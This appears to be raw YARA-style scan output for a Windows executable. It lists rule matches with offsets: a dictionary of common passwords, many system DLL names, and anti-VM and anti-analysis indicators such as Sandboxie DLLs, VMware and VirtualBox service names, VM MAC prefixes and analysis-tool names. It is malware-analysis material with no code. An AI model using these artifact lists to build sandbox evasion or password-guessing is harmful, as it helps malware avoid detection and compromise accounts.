0 0x121bd2 Top1000Passwords danger None any of them
5 0x1464ff 0x146501 0x146503 0x146505 0x146507 0x146509 Top1000Passwords 1111111111 None any of them
0 0x1a131c Top1000Passwords DreAmeR None any of them
0 0x102c6c Top1000Passwords 1981 None any of them
0 0x14bba1 Top1000Passwords changeme None any of them
2 0x105cc8 0x143987 0x143a9f Top1000Passwords Mine None any of them
5 0x107eff 0x107f20 0x107f4e 0x1191d9 0x119225 0x19f502 Top1000Passwords mine None any of them
2 0x1310f7 0x15aca2 0x15e63d Top1000Passwords Mine None any of them
0 0x1a3a78 Top1000Passwords minE None any of them
1 0xfd8e5 0x14bb80 Top1000Passwords 12312 None any of them
5 0x652e3 0x14211f 0x142120 0x142121 0x142122 0x142123 Top1000Passwords xxxx None any of them
31 0x117fe1 0x117fe2 0x117fe3 0x117fe4 0x117fe5 0x117fe6 0x117fe7 0x117fe8 0x117fe9 0x117fea 0x117feb 0x117fec 0x119b58 0x119b59 0x119b5a 0x11a5c1 0x11a5c2 0x11a5c3 0x120d6c 0x153d04 0x15b7df 0x163104 0x163159 0x167708 0x16c278 0x16c421 0x16ebab 0x1798bf 0x18dd27 0x192bdf 0x1a8dfc 0x1a8fb4 Top1000Passwords XXXX None any of them
16 0x12fd2f 0x12fd31 0x12fd33 0x12fd35 0x12fd37 0x12fd39 0x12fd3b 0x12fd3d 0x12fd3f 0x12fd41 0x12fd43 0x12fd45 0x12fd47 0x12fd49 0x12fd4b 0x12fd4d 0x12fd4f Top1000Passwords xxxx None any of them
3 0x65cf4 0x122fe3 0x12302b 0x1231cb Top1000Passwords windows None any of them
2 0x65f3a 0x1083c2 0x131668 Top1000Passwords WindowS None any of them
133 0xf9b7a 0xf9f7e 0xf9fad 0xfcd11 0xfcd1d 0xfef3e 0xfef4d 0xff3f4 0x100caa 0x101c38 0x101c44 0x10228b 0x10243b 0x106550 0x106e6d 0x106fcf 0x10701c 0x10705f 0x107242 0x107383 0x1073b4 0x1073e9 0x107422 0x10745f 0x107498 0x1074dd 0x1074f8 0x107514 0x107640 0x1083dd 0x108510 0x108520 0x10ca28 0x10cc5c 0x113bc2 0x1141b7 0x114212 0x114390 0x1143ff 0x1149fe 0x114ad4 0x114af5 0x114afe 0x114f95 0x1155b8 0x115e5d 0x11658f 0x116d24 0x116db3 0x117250 0x117402 0x119011 0x119f86 0x11e863 0x11f146 0x122bea 0x122bf6 0x122c04 0x122c1c 0x1235e7 0x123b56 0x1241d2 0x1241ef 0x124589 0x125fe3 0x12606b 0x12700e 0x127050 0x127070 0x127082 0x1270c1 0x127ce6 0x128446 0x1284c1 0x12c538 0x12c5d2 0x12dac4 0x12e5f6 0x12e655 0x12e7ee 0x12eadb 0x12eae7 0x131186 0x132403 0x132c81 0x1335ee 0x13a15d 0x13a470 0x13a801 0x13ab8a 0x13abad 0x13abc9 0x13abdc 0x13ac03 0x13ac69 0x13ac83 0x13d254 0x13dbeb 0x13dbf7 0x13e2a4 0x13fe83 0x13fe8f 0x13febc 0x13fec8 0x140471 0x1416e1 0x145db3 0x1460ef 0x1464a7 0x1480b1 0x14851e 0x14856f 0x14a069 0x14a87e 0x14bc6e 0x14bccb 0x14c24c 0x14c4a6 0x14c4f2 0x14cd9c 0x14e9af 0x14ef01 0x15079c 0x1643b5 0x1659d6 0x167363 0x18a563 0x18e43e 0x19af4e 0x1a4b54 0x1a8435 0x1a849b 0x1a9adb 0x1aaa5d Top1000Passwords Windows None any of them
51 0xf9e92 0x102d42 0x103343 0x103b8f 0x1150ff 0x1155e6 0x115cb2 0x1164a9 0x1168d2 0x11720d 0x1182d3 0x11efb7 0x11f0a5 0x11f626 0x11f7a7 0x123085 0x1230a3 0x123215 0x12322d 0x12331f 0x12336b 0x1234a0 0x124023 0x126487 0x12779a 0x1298fe 0x12a6c4 0x12a74e 0x12aa18 0x12aac6 0x12b330 0x12b3b8 0x12c7af 0x12c84f 0x12c8c5 0x12e9ec 0x12ee63 0x12f770 0x12fad7 0x131874 0x133823 0x1339f6 0x13e48b 0x13f548 0x145528 0x14553e 0x146357 0x146b8a 0x148034 0x148844 0x148c49 0x14c876 Top1000Passwords Windows None any of them
27 0x1010e9 0x10768c 0x1082ce 0x10cfde 0x10d17c 0x11ea39 0x11f26b 0x12381e 0x124067 0x12410a 0x129dfa 0x129e18 0x12db07 0x12db8c 0x12dd99 0x12de80 0x1326ea 0x13a0f9 0x13e577 0x144695 0x148117 0x14ab4e 0x14abfc 0x14dbfe 0x19e7a9 0x1a1838 0x1a230d 0x1a316b Top1000Passwords windows None any of them
8 0x114877 0x1156ad 0x14027a 0x145f6a 0x145f8a 0x145fa2 0x14a0ac 0x14b012 0x1aa591 Top1000Passwords WINDOWS None any of them
0 0x1428d8 Top1000Passwords WINDOWS None any of them
0 0x14de29 Top1000Passwords WIndows None any of them
16 0x65203 0x66e04 0x66fd4 0xf8a38 0xf9fbf 0xfa008 0xfb74a 0xfb754 0xfde61 0x118648 0x11af9a 0x11b07f 0x11b5e2 0x11c35d 0x1429c3 0x19aaac 0x19aabc Top1000Passwords 456789 None any of them
1 0x117e73 0x117ebb Top1000Passwords 456789 None any of them
0 0x11d822 Top1000Passwords 1975 None any of them
0 0x14fc9a Top1000Passwords BOBBY None any of them
0 0x14d19f Top1000Passwords NewPort None any of them
0 0x19ed33 Top1000Passwords Daddy None any of them
0 0x1a4ca9 Top1000Passwords daddy None any of them
3 0x67a20 0x67a38 0x67a60 0x67c00 Top1000Passwords american None any of them
6 0x64823 0x648d4 0x648f4 0x120201 0x14dad1 0x1a34bc 0x1a7e6a Top1000Passwords eric None any of them
0 0x651a4 Top1000Passwords ERIC None any of them
4 0x67a24 0x67a3c 0x67a64 0x67c04 0x683cc Top1000Passwords eric None any of them
0 0x132a58 Top1000Passwords ERIC None any of them
0 0x141fdb Top1000Passwords eRic None any of them
0 0x14a99c Top1000Passwords Eric None any of them
0 0x1a7e62 Top1000Passwords Alpha None any of them
6 0x106939 0x10696b 0x106be1 0x106f68 0x106f85 0x140cb1 0x161c0a Top1000Passwords HARD None any of them
0 0x10858a Top1000Passwords Hard None any of them
4 0x113dc2 0x140cbd 0x140cce 0x149657 0x1a54dd Top1000Passwords hard None any of them
0 0x11f89b Top1000Passwords hard None any of them
0 0x143b03 Top1000Passwords Hard None any of them
1 0x68418 0x1436a4 Top1000Passwords england None any of them
0 0x6800e Top1000Passwords brazil None any of them
0 0x107f46 BitCoin bitcoin None any of them
2 0x11ee27 0x11ee41 0x11ee5b ActiveX_Interface_Marshaling_Library_Detection_1 actxprxy.Dll None any of them
0 0x639d8 Advanced_Windows_32_Base_API_Detection_1 advapi32.dll None any of them
2 0x1076d6 0x13299f 0x1aaeaf Advanced_Windows_32_Base_API_Detection_1 Advapi32.dll None any of them
0 0x10840a Advanced_Windows_32_Base_API_Detection_1 advapi32.dll None any of them
0 0x133fc4 Advanced_Windows_32_Base_API_Detection_1 ADVAPI32.dll None any of them
0 0x146da4 Advanced_Windows_32_Base_API_Detection_1 ADVAPI32.DLL None any of them
0 0x18f435 Advanced_Windows_32_Base_API_Detection_1 AdvApi32.dll None any of them
0 0x12651d PlugProject_DLL_Detection_1 all.dll None any of them
0 0x63980 ApiSet_Stub_DLL_Detection_108 api-ms-win-core-registry-l1-1-0.dll None any of them
2 0x103abe 0x107973 0x12973f api_dll_Detection_1 API.dll None any of them
9 0x107df2 0x11495d 0x116dd5 0x12a61b 0x133cc1 0x133cdf 0x1400de 0x140147 0x14c818 0x14d0a8 api_dll_Detection_1 api.dll None any of them
0 0x116d08 api_dll_Detection_1 Api.dll None any of them
0 0x12a72d api_dll_Detection_1 API.DLL None any of them
0 0x14c8fd api_dll_Detection_1 api.DLL None any of them
0 0x639de EDIABAS_Server_Interface_for_Win32_Detection_1 api32.dll None any of them
7 0x1076d9 0x108247 0x10840d 0x1147c0 0x12f8e7 0x1329a2 0x13decd 0x1aaeb2 EDIABAS_Server_Interface_for_Win32_Detection_1 api32.dll None any of them
0 0x133fc7 EDIABAS_Server_Interface_for_Win32_Detection_1 API32.dll None any of them
0 0x146da7 EDIABAS_Server_Interface_for_Win32_Detection_1 API32.DLL None any of them
0 0x18f438 EDIABAS_Server_Interface_for_Win32_Detection_1 Api32.dll None any of them
0 0x10c970 Windows_NT_OpenType_Type_1_Font_Driver_Detection_1 atmfd.dll None any of them
0 0x1083a6 AVI_Capture_window_class_Detection_1 avicap32.dll None any of them
1 0x117124 0x14b2d2 avast_English_Basic_Module_Detection_1 BASE.dll None any of them
0 0x13eabf avast_English_Basic_Module_Detection_1 base.dll None any of them
0 0x14029b avast_English_Basic_Module_Detection_1 base.dll None any of them
0 0x133c88 Microsoft_Cabinet_File_API_Detection_1 Cabinet.dll None any of them
1 0x10ca02 0x10ca15 Code_Integrity_Module_Detection_1 CI.dll None any of them
0 0xf9f3a UnKnown_Detection_93 client.dll None any of them
0 0x13ded6 Microsoft_Connection_Manager_Phonebook_Detection_1 cmpbk32.dll None any of them
0 0x14013a Microsoft_Connection_Manager_Utility_Lib_Detection_1 cmutil.dll None any of them
0 0xff5d6 Get_Connected_Wizards_Detection_1 Connect.dll None any of them
0 0xf9e36 Multi_Theft_Auto_Module_Detection_1 core.dll None any of them
0 0x170f2d Multi_Theft_Auto_Module_Detection_1 Core.dll None any of them
0 0x1152a5 Crash_Report_Module_Detection_1 CrashReport.dll None any of them
0 0x10ca88 Microsoft_C_Runtime_Library_Detection_1 CRTDLL.DLL None any of them
1 0x14aa2e 0x1709d0 Microsoft_C_Runtime_Library_Detection_1 CRTDLL.dll None any of them
0 0x107e6a _32_bitars_kryptografi_API_Detection_1 Crypt32.dll None any of them
0 0x108742 _32_bitars_kryptografi_API_Detection_1 crypt32.dll None any of them
1 0x11711a 0x14b2c8 Base_cryptographic_API_DLL_Detection_1 CRYPTBASE.dll None any of them
0 0x140296 Base_cryptographic_API_DLL_Detection_1 cryptbase.dll None any of them
0 0x108c31 Cryptography_Manager_Detection_1 cryptdll.dll None any of them
0 0x13ce9a InstallShield_R_Ctor_DLL_Detection_1 ctor.dll None any of them
0 0x1709de Cygwin_POSIX_Emulation_DLL_Detection_1 cygwin1.dll None any of them
0 0x1068f6 Windows_Image_Helper_Detection_2 dbghelp.dll None any of them
0 0x146532 Debug_Detection_3 Debug.dll None any of them
0 0x10567f Sammanfattning_av_SSPI_autentiseringspaket_Detection_1 digest.dll None any of them
0 0x107def DNS_Client_API_DLL_Detection_1 Dnsapi.dll None any of them
0 0x11495a DNS_Client_API_DLL_Detection_1 dnsapi.dll None any of them
0 0x116d05 DNS_Client_API_DLL_Detection_1 DnsApi.dll None any of them
0 0x12973c DNS_Client_API_DLL_Detection_1 DNSAPI.dll None any of them
0 0x149a55 UnKnown_Detection_192 dump.dll None any of them
1 0x133cbe 0x133cdc Microsoft_Desktop_Window_Manager_API_Detection_1 dwmapi.dll None any of them
0 0xff5ca UnKnown_Detection_207 en.dll None any of them
0 0x114b75 Windows_Error_Reporting_Service_Detection_1 ERSVC.DLL None any of them
2 0x1174cc 0x13ce04 0x143038 COM__Detection_3 es.dll None any of them
0 0x10796b Windows_Firewall_API_Detection_1 FirewallAPI.dll None any of them
0 0x115131 Fax_Service_Detection_1 fxsst.dll None any of them
2 0x107fc1 0x1587be 0x18f44f GDI_Client_DLL_Detection_1 Gdi32.dll None any of them
0 0x10c967 GDI_Client_DLL_Detection_1 GDI32.DLL None any of them
1 0x158514 0x158665 GDI_Client_DLL_Detection_1 GDI32.dll None any of them
0 0x1400e5 OpenGL_Metafiling_DLL_Detection_1 glmf32.dll None any of them
1 0x11f3d6 0x12f29d Hardware_Abstraction_Layer_DLL_Detection_1 HAL.dll None any of them
0 0x12cfbf Hardware_Abstraction_Layer_DLL_Detection_1 hal.dll None any of them
0 0x13a7ad hccutils_Module_Detection_1 hccutils.DLL None any of them
0 0x14aa5c Host_Library_Detection_1 Helper.DLL None any of them
0 0x14aaba Host_Library_Detection_1 Helper.dll None any of them
0 0x116c0e Hid_User_Library_Detection_1 hid.dll None any of them
0 0x116c78 Hid_User_Library_Detection_1 HID.dll None any of them
0 0x11ebee Home_Networking_Configuration_Manager_Detection_1 hnetcfg.dll None any of them
1 0x106b97 0x14fd61 CapsAndNumKeyNotify_Detection_1 Hook.dll None any of them
0 0x12ef9c CapsAndNumKeyNotify_Detection_1 HOOK.DLL None any of them
0 0x146a96 CapsAndNumKeyNotify_Detection_1 Hook.DLL None any of them
0 0x11551e ICMP_DLL_Detection_1 ICMP.DLL None any of them
0 0x13a7b2 User_Location_Services_Component_Module_Detection_1 ils.DLL None any of them
0 0x1169ee Windows_NT_Image_Helper_Detection_1 imagehlp.dll None any of them
1 0x14d0b0 0x14e9a5 Garena_Inject_Detection_1 Inject.Dll None any of them
0 0x116dd0 IP_Helper_API_Detection_1 iphlpapi.dll None any of them
0 0x14c8f8 IP_Helper_API_Detection_1 iphlpapi.DLL None any of them
0 0x105667 Kerberos_Security_Package_Detection_1 kerberos.dll None any of them
0 0x102cd0 UnKnown_Detection_344 kernel.dll None any of them
17 0x7c126 0x103975 0x1531de 0x153722 0x153dc3 0x1541e5 0x1584fa 0x15864b 0x159b5d 0x15d10f 0x16e75a 0x171b4d 0x17b84d 0x17f1b4 0x17fe26 0x17ff14 0x184aab 0x19074a Windows_NT_BASE_API_Client_DLL_Detection_1 KERNEL32.dll None any of them
12 0x106d6a 0x154db0 0x15557f 0x1587dc 0x159872 0x15d806 0x15da49 0x15db43 0x169392 0x175152 0x188917 0x18a8a6 0x18f41d Windows_NT_BASE_API_Client_DLL_Detection_1 Kernel32.dll None any of them
47 0x108475 0x11f27e 0x12ff06 0x130942 0x130a06 0x13d700 0x144887 0x153837 0x154e3e 0x15e0e0 0x15ee55 0x160fc3 0x161a81 0x161b0e 0x161e5a 0x161f5b 0x1623d8 0x163dcd 0x165541 0x1697d3 0x16ab1a 0x16e37b 0x16f9d2 0x16fdb1 0x17005e 0x172971 0x172a2d 0x172ff4 0x17a0bc 0x17a36e 0x17bf90 0x17c50c 0x17d082 0x17e511 0x180a69 0x180f53 0x18106a 0x1811ea 0x18502d 0x1860f0 0x186c70 0x18ae89 0x18c394 0x18d3a2 0x18d3f7 0x192c8e 0x193930 0x1ab201 Windows_NT_BASE_API_Client_DLL_Detection_1 kernel32.dll None any of them
0 0x114564 Windows_NT_BASE_API_Client_DLL_Detection_1 KerNel32.dll None any of them
0 0x1165f9 Windows_NT_BASE_API_Client_DLL_Detection_1 KERNEL32.DLL None any of them
1 0x116a17 0x133a6e Windows_NT_BASE_API_Client_DLL_Detection_1 kernel32.dll None any of them
15 0x145248 0x1546a6 0x1546c4 0x15e5a1 0x15fcf4 0x161733 0x16607a 0x16c564 0x16f468 0x171c39 0x172e79 0x180920 0x1809aa 0x1843a6 0x18b496 0x18ea6e Windows_NT_BASE_API_Client_DLL_Detection_1 KERNEL32.DLL None any of them
2 0x15f035 0x17cde9 0x18865d Windows_NT_BASE_API_Client_DLL_Detection_1 kErNeL32.dLl None any of them
4 0x160cdc 0x16ac4f 0x16aca4 0x16f3d3 0x17608b Windows_NT_BASE_API_Client_DLL_Detection_1 KeRnEl32.dLl None any of them
0 0x107e46 OpenSSL_Shared_Library_Detection_2 libeay32.dll None any of them
0 0x107e52 UnKnown_Detection_404 libssl32.dll None any of them
0 0x105673 Live_Security_Package_Detection_1 livessp.dll None any of them
1 0x105163 0x106905 Migration_Logging_Interface_Detection_1 log.dll None any of them
0 0x105692 Server_DLL_fr_LSA_Detection_1 lsasrv.dll None any of them
1 0x149523 0x149672 Server_DLL_fr_LSA_Detection_1 LSASRV.DLL None any of them
1 0x133cc0 0x133cde UnKnown_Detection_443 mapi.dll None any of them
0 0x1147bf Extended_MAPI_1_0_for_Windows_NT_Detection_1 mapi32.dll None any of them
0 0x144545 UnKnown_Detection_473 mozglue.dll None any of them
0 0x140144 Windows_NT_MP_Router_Administration_DLL_Detection_1 mprapi.dll None any of them
0 0x15192f Microsoft_ACM_Audio_Filter_Detection_1 MSACM32.dll None any of them
1 0x65048 0x12d8f7 Microsoft_NET_Runtime_Execution_Engine_Detection_1 mscoree.dll None any of them
2 0x157915 0x159b79 0x161695 Microsoft_NET_Runtime_Execution_Engine_Detection_1 mscoree.dll None any of them
0 0xfc1a1 Inloggnings_GINA_fr_Windows_NT_Detection_1 msgina.dll None any of them
1 0x1276a8 0x127700 Microsoft_R_HTML_Viewer_Detection_1 mshtml.dll None any of them
2 0x105f7b 0x127508 0x127515 Windows_Installer_Detection_1 msi.dll None any of them
0 0x118a6f Windows_Installer_Detection_1 MSI.dll None any of them
0 0x1400cf Ports_Class_Installer_Detection_1 msports.dll None any of them
0 0x14c42e Visual_Basic_Virtual_Machine_Detection_1 MSVBVM50.DLL None any of them
0 0x145b4e Visual_Basic_Virtual_Machine_Detection_2 msvbvm60.dll None any of them
0 0x116eef Microsoft_R_C_Runtime_Library_Detection_3 MSVCP60.DLL None any of them
0 0x133fee Microsoft_C_Runtime_Library_Detection_29 MSVCR120.dll None any of them
0 0x133d88 Microsoft_C_Runtime_Library_Detection_30 MSVCR120D.dll None any of them
0 0x654c0 Windows_NT_CRT_DLL_Detection_1 msvcrt.dll None any of them
3 0x103981 0x1709be 0x17b8bd 0x184b3d Windows_NT_CRT_DLL_Detection_1 MSVCRT.dll None any of them
0 0x170a09 Windows_NT_CRT_DLL_Detection_1 msvcrt.dll None any of them
0 0xfa5ad Microsoft_Windows_Sockets_2_0_Service_Provider_Detection_2 mswsock.dll None any of them
0 0x107793 Microsoft_Windows_Sockets_2_0_Service_Provider_Detection_2 Mswsock.dll None any of them
0 0x1400da Network_DDE_Share_Management_APIs_Detection_1 nddeapi.dll None any of them
3 0xf9c3c 0x1047e2 0x107c9b 0x133c8c Java_TM_Platform_SE_binary_Detection_3 net.dll None any of them
0 0x101d8e Java_TM_Platform_SE_binary_Detection_3 net.dll None any of them
0 0x1318f1 Java_TM_Platform_SE_binary_Detection_3 NET.dll None any of them
0 0x14a36f Java_TM_Platform_SE_binary_Detection_3 NET.DLL None any of them
0 0x108244 Net_Win32_API_DLL_Detection_1 netapi32.dll None any of them
0 0x12bdc8 libcurl_Shared_Library_Detection_3 Network.dll None any of them
0 0x1313b0 NSPR_Library_Detection_1 nspr4.dll None any of them
0 0x1313b9 UnKnown_Detection_510 nss3.dll None any of them
0 0xfa5a4 NT_Layer_DLL_Detection_1 ntdll.dll None any of them
0 0x114b7e Shell_extensions_for_sharing_Detection_2 ntshrui.dll None any of them
0 0x107ee6 NVIDIA_Compatible_CUDA_Driver_Version_175_16_Detection_1 nvcuda.dll None any of them
0 0x1489e2 Microsoft_ODBC_Driver_Manager_Detection_1 odbc32.dll None any of them
0 0x7c16a Microsoft_OLE_for_Windows_Detection_1 ole32.dll None any of them
0 0x129795 Microsoft_OLE_for_Windows_Detection_1 OLE32.DLL None any of them
0 0x14b272 Microsoft_OLE_for_Windows_Detection_1 ole32.dll None any of them
0 0x18f459 Microsoft_OLE_for_Windows_Detection_1 Ole32.dll None any of them
0 0x146dd2 UnKnown_Detection_530 OLEAUT32.DLL None any of them
0 0x18f442 UnKnown_Detection_530 Oleaut32.dll None any of them
0 0x107edc OpenCL_Client_DLL_Detection_1 OpenCL.dll None any of them
0 0x107ef0 OpenGL_Client_DLL_Detection_1 opengl32.dll None any of them
0 0x1081e8 packet_dll_Vista_Dynamic_Link_Library_Detection_1 packet.dll None any of them
0 0x144c20 packet_dll_Vista_Dynamic_Link_Library_Detection_1 packet.dll None any of them
0 0x1275a5 Photoshop_Plugin_Utilities_Detection_1 Plugin.dll None any of them
0 0x10322a IE_PNG_plugin_image_decoder_Detection_1 pngfilt.Dll None any of them
2 0x12a619 0x14c816 0x14d0a6 Process_Status_Helper_Detection_1 psapi.dll None any of them
0 0x12a72b Process_Status_Helper_Detection_1 PSAPI.DLL None any of them
0 0x106919 Deprecated_Protected_Storage_COM_interfaces_Detection_1 pstorec.dll None any of them
0 0x12c38c Python_Core_Detection_6 python27.dll None any of them
0 0x170f2a C_application_development_framework__Detection_6 Qt5Core.dll None any of them
0 0x170f3d C_application_development_framework__Detection_37 QtCore4.dll None any of them
0 0x140146 Mobile_Device_Remote_API_Detection_1 rapi.dll None any of them
1 0x104fe9 0x148c0a UnKnown_Detection_604 rld.dll None any of them
0 0x14bd13 Remote_Procedure_Call_Runtime_Detection_1 RPCRT4.DLL None any of them
0 0x13e6b9 Distributed_COM_Services_Detection_1 Rpcss.dll None any of them
0 0x13f729 SAM_Server_DLL_Detection_1 samsrv.dll None any of them
4 0x107df1 0x11495c 0x12a61a 0x14c817 0x14d0a7 Speech_API_Detection_1 sapi.dll None any of them
0 0x116d07 Speech_API_Detection_1 sApi.dll None any of them
0 0x12973e Speech_API_Detection_1 SAPI.dll None any of them
0 0x12a72c Speech_API_Detection_1 SAPI.DLL None any of them
0 0x12ef1d TLS_SSL_Security_Provider_Detection_1 SCHANNEL.DLL None any of them
0 0x131429 Microsoft_Win32_Security_Services_Detection_1 Secur32.dll None any of them
1 0x103a0e 0x13140b Windows_Shell_Common_Dll_Detection_1 SHELL32.dll None any of them
2 0x10735c 0x129481 0x17d0d6 Windows_Shell_Common_Dll_Detection_1 Shell32.dll None any of them
0 0x12d10d Windows_Shell_Common_Dll_Detection_1 SHELL32.DLL None any of them
1 0x12f9a8 0x12f9e0 Windows_Shell_Common_Dll_Detection_1 SHELL32.DLL None any of them
0 0x133a86 Windows_Shell_Common_Dll_Detection_1 shell32.dll None any of them
0 0x103aba Shell_Light_weight_Utility_Library_Detection_1 SHLWAPI.dll None any of them
0 0x13eab4 SQLite3_Dynamic_Link_Library_Detection_1 sqlite3.dll None any of them
0 0x117ba7 SQL_Server_ODBC_Driver_Detection_1 sqlsrv32.dll None any of them
0 0x107e3a OpenSSL_shared_library_Detection_4 ssleay32.dll None any of them
0 0xfd898 Superfetch_Service_Host_Detection_1 sysmain.dll None any of them
0 0x108246 Microsoft_Windows_TM_Telephony_API_Client_DLL_Detection_1 tapi32.dll None any of them
0 0x126866 Remote_Desktop_Session_Host_Server_Remote_Connections_Manager_Detection_1 termsrv.dll None any of them
0 0x12759d Setup_Test_Module_Plugin_Detection_1 TestPlugin.dll None any of them
0 0x105689 Web_Service_Security_Package_Detection_1 tspkg.dll None any of them
1 0x103bd4 0x114b83 UnKnown_Detection_683 ui.dll None any of them
0 0x107cd2 OLE32_tillgg_fr_Win32_Detection_1 urlmon.dll None any of them
2 0x107fca 0x1587a0 0x18f42a Multi_User_Windows_USER_API_Client_DLL_Detection_1 User32.dll None any of them
9 0x108500 0x146f16 0x154eba 0x15627e 0x15f849 0x16abc6 0x17a41a 0x181077 0x18503a 0x185631 Multi_User_Windows_USER_API_Client_DLL_Detection_1 user32.dll None any of them
0 0x10c949 Multi_User_Windows_USER_API_Client_DLL_Detection_1 user32.dll None any of them
0 0x12d8e3 Multi_User_Windows_USER_API_Client_DLL_Detection_1 USER32.DLL None any of them
0 0x1428fe Multi_User_Windows_USER_API_Client_DLL_Detection_1 UsEr32.dLl None any of them
2 0x14316f 0x15e5c2 0x1883ff Multi_User_Windows_USER_API_Client_DLL_Detection_1 USER32.DLL None any of them
6 0x158508 0x158659 0x16a0d5 0x17b543 0x17b869 0x18027b 0x184ad5 Multi_User_Windows_USER_API_Client_DLL_Detection_1 USER32.dll None any of them
0 0x146dd6 UnKnown_Detection_698 UT32.DLL None any of them
0 0x18f446 UnKnown_Detection_698 ut32.dll None any of them
0 0x106b93 VirtualBox_Hook_Driver_Detection_1 VBoxHook.dll None any of them
2 0x116e87 0x126209 0x12d737 UnKnown_Detection_714 ver.dll None any of them
0 0x146db0 Version_Checking_and_File_Installation_Libraries_Detection_1 VERSION.DLL None any of them
0 0x10567e Microsoft_Digest_Access_Detection_1 wdigest.dll None any of them
0 0x117502 Stillbildsenhetstjnst_Detection_1 wiaservc.dll None any of them
0 0xf9c38 Internet_Extensions_for_Win32_Detection_1 Wininet.dll None any of them
0 0x107c97 Internet_Extensions_for_Win32_Detection_1 wininet.dll None any of them
0 0x1318ed Internet_Extensions_for_Win32_Detection_1 WININET.dll None any of them
0 0x14a36b Internet_Extensions_for_Win32_Detection_1 WININET.DLL None any of them
0 0x108144 MCI_API_DLL_Detection_1 winmm.dll None any of them
0 0x13f6b6 Microsoft_Smart_Card_API_Detection_1 WinSCard.dll None any of them
0 0x11d540 Multi_User_Windows_Server_DLL_Detection_1 winsrv.dll None any of them
0 0xfde30 Windows_Media_Screen_Encoder_Detection_1 wmsdmoe.dll None any of them
0 0x1081f9 wpcap_dll_Dynamic_Link_Library_based_on_libpcap_0_9_6_branch_Detection_1 wpcap.dll None any of them
0 0x10773f Windows_Socket_2_0_32_Bit_DLL_Detection_1 Ws2_32.dll None any of them
0 0x129731 Windows_Socket_2_0_32_Bit_DLL_Detection_1 WS2_32.dll None any of them
0 0x130969 Windows_Socket_2_0_32_Bit_DLL_Detection_1 ws2_32.dll None any of them
0 0x14a361 Windows_Socket_2_0_32_Bit_DLL_Detection_1 WS2_32.DLL None any of them
0 0x107753 Windows_Socket_32_Bit_DLL_Detection_1 wsock32.dll None any of them
0 0x1318e2 Windows_Socket_32_Bit_DLL_Detection_1 WSock32.dll None any of them
0 0x146dbb Windows_Socket_32_Bit_DLL_Detection_1 WSOCK32.DLL None any of them
0 0x1aa753 Windows_Socket_32_Bit_DLL_Detection_1 WSOCK32.dll None any of them
0 0x13deca Windows_Remote_Desktop_Session_Host_Server_SDK_APIs_Detection_1 wtsapi32.dll None any of them
0 0x113e25 Windows_Update_AutoUpdate_Service_Detection_1 wuauserv.dll None any of them
0 0x147366 MS_DTC_helper_APIs_DLL_Detection_1 XOLEHLP.dll None any of them
0 0x0 Windows_DOS_executable_file_EXE MZ None $1 at 0
0 0x106a72 AntiVMGeneric  None any of them
0 0x106a6e AntiVMGeneric E None any of them
1 0xfbcda 0x12f015 AntiVMGeneric SBieDll.dll None any of them
0 0x1068eb AntiVMGeneric sbiedll.dll None any of them
0 0x106ed6 AntiVMGeneric SbieDLL.dll None any of them
0 0x1068f6 AntiVMGeneric dbghelp.dll None any of them
0 0x106901 AntiVMGeneric api_log.dll None any of them
0 0x10690c AntiVMGeneric dir_watch.dll None any of them
0 0x106919 AntiVMGeneric pstorec.dll None any of them
0 0x106924 AntiVMGeneric vmcheck.dll None any of them
0 0x10692f AntiVMGeneric wpespy.dll None any of them
0 0x70fd2 VBOX_MAC_Address_CouldBeFP ' None any of them
0 0x106c49 VBOX_MAC_Address_CouldBeFP 08:00:27 None any of them
0 0x106c41 VBOX_MAC_Address_CouldBeFP 08-00-27 None any of them
0 0x108607 VMWare_2 vmware2 None any of them
1 0x10860e 0x10860e VMWare_2 vmount2 None any of them
1 0x108615 0x108615 VMWare_2 vmusrvc None any of them
1 0x106aeb 0x106aeb VMWare_2 vmsrvc None any of them
0 0x106a7a VMWare_2 Ven_VMware_ None any of them
0 0x106a85 VMWare_2 Prod_VMware_Virtual_ None any of them
0 0x1085f2 VMWare_2 vmhgfs.sys None any of them
0 0x106aeb VMWare_2 vmsrvc.sys None any of them
0 0x106af5 VMWare_2 vmx86.sys None any of them
0 0x106afe VMWare_2 vmnet.sys None any of them
0 0x106b07 VMWare_2 vmicheartbeat None any of them
0 0x106b14 VMWare_2 vmicvss None any of them
0 0x106b1b VMWare_2 vmicshutdown None any of them
0 0x106b27 VMWare_2 vmicexchange None any of them
0 0x106b33 VMWare_2 vmdebug None any of them
1 0x106b3a 0x10856c VMWare_2 vmmouse None any of them
0 0x106b41 VMWare_2 vmtools None any of them
0 0x108600 VMWare_2 VMTools None any of them
0 0x106b48 VMWare_2 VMMEMCTL None any of them
0 0x106af5 VMWare_2 vmx86 None any of them
5 0x106a11 0x106a21 0x106a2f 0x106a7e 0x106a8a 0x108577 VMWare_2 VMware None any of them
7 0x106b50 0x106d21 0x106f07 0x106f11 0x106f21 0x106f31 0x106f40 0x108607 VMWare_2 vmware None any of them
0 0x106bca VMWare_2 VBoxGuestAdditions None any of them
0 0x106bdc VMWare_2 VBOX HARDDISK None any of them
1 0x106b9f 0x106ef8 VMWare_2 VBoxService None any of them
0 0x10861c VMWare_2 vboxservice None any of them
0 0x106baa VMWare_2 VBoxTray None any of them
0 0x108627 VMWare_2 vboxtray None any of them
0 0x106bf1 VMWare_MAC_Address_CouldBeFP 00:05:69 None any of them
0 0x106be9 VMWare_MAC_Address_CouldBeFP 00-05-69 None any of them
0 0x77d03 VMWare_MAC_Address_CouldBeFP ) None any of them
0 0x106c33 VMWare_MAC_Address_CouldBeFP 00:1C:14 None any of them
0 0x106c2b VMWare_MAC_Address_CouldBeFP 00-1C-14 None any of them
18 0x5fd0a 0x6204a 0x79dc7 0x8d3f5 0x10b6fc 0x1578a6 0x15de1f 0x15de74 0x16aa02 0x16d5fb 0x16ea6d 0x173542 0x17aabd 0x17d48b 0x17e354 0x1844f9 0x185f41 0x187969 0x195c55 VMWare_MAC_Address_CouldBeFP PV None any of them
0 0x106c07 VMWare_MAC_Address_CouldBeFP 00:50:56 None any of them
0 0x106bff VMWare_MAC_Address_CouldBeFP 00-50-56 None any of them
0 0x77dff Parallels_MAC_Address_CouldBeFP B None any of them
0 0x13a718 LitecoinAddress_maybe_FP MicrosoftwudMessageECD4FC4D None $1
0 0x12ae4c NeoAddress_maybe_FP Agency0StartServiceCtrlDispatcherA None $1
0 0x103405 AntiAnalysisGenericBin ? None any of them
0 0x106a52 AntiAnalysisGenericBin VMXh None any of them
0 0x106a6e AntiAnalysisGenericBin E None any of them
0 0x106a72 AntiAnalysisGenericBin  None any of them
0 0x106df8 AntiAnalysisGeneric processhacker.exe None any of them
0 0x106daf AntiAnalysisGeneric processmonitor.exe None any of them
